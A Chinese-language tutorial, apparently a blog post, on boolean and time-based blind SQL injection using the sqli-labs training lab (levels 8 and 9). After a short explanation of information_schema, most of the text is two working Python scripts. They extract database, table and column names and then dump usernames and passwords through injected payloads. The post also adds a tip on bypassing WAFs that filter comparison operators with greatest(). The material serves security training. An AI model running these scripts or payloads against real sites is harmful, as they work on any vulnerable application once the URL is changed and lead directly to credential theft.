目录
一:基础知识引导
数据库:information_schema里面记录着数据库的所有元信息
二,布尔盲注,时间盲注
(1)布尔盲注案例(以sqli-labs第八关为例):
(2)时间盲注案例(以sqli-labs第九关为例):
一:基础知识引导
数据库:information_schema里面记录着数据库的所有元信息
use information_schema;
schemata表,记录着所有数据库(schema_name数据库的名称)
select schema_name from schemata;
tables表,记录着所有表(重要字段:table_schema所属的数据库,table_name数据表的名称)
select table_name from tables where table_schema = "security"; 查找数据库”security“的所有表
columns表,记录着所有字段(列)(table_schema所属数据库,table_name数据表的名称,column_name列名称)
select column_name from columns where table_schema="security" and table_name="users";查找数据库为“security”,表为“users”的所有字段名称
二,布尔盲注,时间盲注
特征:
1,其实这两个盲注本质上是一样的,两个盲注都是页面没有回显(报错回显,查询结果回显)
2,布尔盲注是sql执行结果正确和错误显示的页面不一样,可以从返回页面的情况来进行判断。时间盲注则是sql执行结果正确与否显示的页面都一样,但是确实存在sql注入的情况,此时可以使用if(条件,sleep(3),)对是否沉睡三秒来进行判断
(1)布尔盲注案例(以sqli-labs第八关为例):
可以看到对sql查询有结果的话显示的页面是"You are in...........",没结果则不显示,此时可以使用sqlmap软件去进行盲注查找,也可以使用sql脚本去遍历查找自己所需的值。
python脚本代码:
import requests
# URL = "http://localhost/Less-8/"
# paload = {"id":"1' and ascii(substr(database(),1,1))=115 -- "}
# res = requests.get(url=URL,params=paload)
# if "You are in" in res.text:
# print("yes")
# else:
# print("no")
def get_database(URL):
# 获取数据库名称
s = ""
for i in range(1,10):
low = 32
hight = 128
mid = (low+hight)//2
while(hight > low):
paload = {"id": f"1' and greatest(ascii(substr(database(),{i},1)),{mid})={mid} -- "}#相当于第一个字符<={mid}条件判断为真
res = requests.get(url=URL, params=paload)
if "You are in" in res.text:
hight = mid
mid = (low + hight) // 2
else:
low = mid +1
mid = (low + hight) // 2
s+=chr(mid)
print("数据库名称:"+s)
def get_table(URL):
# 获取表名称
s = ""
for i in range(1,32):
low = 32
hight = 128
mid = (low+hight)//2
while(hight > low):
paload = {"id": f"1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid} -- "}
res = requests.get(url=URL, params=paload)
if "You are in" in res.text:
low = mid +1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
s+=chr(mid)
print("表的名称:"+s)
def get_column(URL):
# 获取管理员的字段名称
s = ""
for i in range(1,32):
low = 32
hight = 128
mid = (low+hight)//2
while(hight > low):
paload = {"id": f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid} -- "}
res = requests.get(url=URL, params=paload)
if "You are in" in res.text:
low = mid +1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
s+=chr(mid)
print("列的名称:"+s)
def get_result(URl):
# 获取用户名和密码信息
s = ""
for i in range(1,32):
low = 32
hight = 128
mid = (low+hight)//2
while(hight > low):
paload = {"id": f"1' and ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid} -- "}
res = requests.get(url=URL, params=paload)
if "You are in" in res.text:
low = mid +1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
s+=chr(mid)
print("用户名及密码信息:"+s)
if __name__ == '__main__':
URL = "http://localhost/Less-8/"
# get_database(URL)
# get_table(URL)
# get_column(URL)
get_result(URL)执行结果:
这里我只遍历了32位,有需要可以增加。
(2)时间盲注案例(以sqli-labs第九关为例):
php代码:
可以看出无论sql正确与否,查到或者未查到显示的页面都是一样的,但是还是存在时间盲注:可以用if(1=1,sleep(3),1)测试一下
此时,浏览器上方转圈圈转了三秒,说明存在时间盲注,此时用python脚本遍历的方法大致跟布尔盲注一样,只需要将sql条件注入写到if()中1=1的位置即可。然后根据浏览器获得页面的前后时间进行判断。
python脚本代码:
import requests
import datetime
# URL = "http://localhost/Less-8/"
# paload = {"id":"1' and ascii(substr(database(),1,1))=115 -- "}
# res = requests.get(url=URL,params=paload)
# if "You are in" in res.text:
# print("yes")
# else:
# print("no")
def get_database(URL):
# 获取数据库名称
s = ""
for i in range(1,10):
low = 32
hight = 128
mid = (low+hight)//2
while(hight > low):
paload = {"id": f"1' and if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(3),1) -- "}#相当于第一个字符<={mid}条件判断为真
start = datetime.datetime.now()
res = requests.get(url=URL, params=paload)
end = datetime.datetime.now()
if (end - start).seconds >=3:
hight = mid
mid = (low + hight) // 2
else:
low = mid +1
mid = (low + hight) // 2
s+=chr(mid)
print("数据库名称:"+s)
def get_table(URL):
# 获取表名称
s = ""
for i in range(1,32):
low = 32
hight = 128
mid = (low+hight)//2
while(hight > low):
paload = {"id": f"1' and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(3),1) -- "}
start = datetime.datetime.now()
res = requests.get(url=URL, params=paload)
end = datetime.datetime.now()
if (end - start).seconds >=3:
low = mid +1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
s+=chr(mid)
print("表的名称:"+s)
def get_column(URL):
# 获取管理员的字段名称
s = ""
for i in range(1,32):
low = 32
hight = 128
mid = (low+hight)//2
while(hight > low):
paload = {"id": f"1' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(3),1) -- "}
start = datetime.datetime.now()
res = requests.get(url=URL, params=paload)
end = datetime.datetime.now()
if (end - start).seconds >=3:
low = mid +1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
s+=chr(mid)
print("列的名称:"+s)
def get_result(URl):
# 获取用户名和密码信息
s = ""
for i in range(1,32):
low = 32
hight = 128
mid = (low+hight)//2
while(hight > low):
paload = {"id": f"1' and if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(3),1) -- "}
start = datetime.datetime.now()
res = requests.get(url=URL, params=paload)
end = datetime.datetime.now()
if (end - start).seconds >=3:
low = mid +1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
s+=chr(mid)
print("用户名及密码信息:"+s)
if __name__ == '__main__':
URL = "http://localhost/Less-9/"
get_database(URL)
# get_table(URL)
# get_column(URL)
# get_result(URL)结果:
上面两个python脚本代码的第一个获取数据库的函数,sql语句注入用到了greatest函数,可用来绕过过滤掉<>的waf
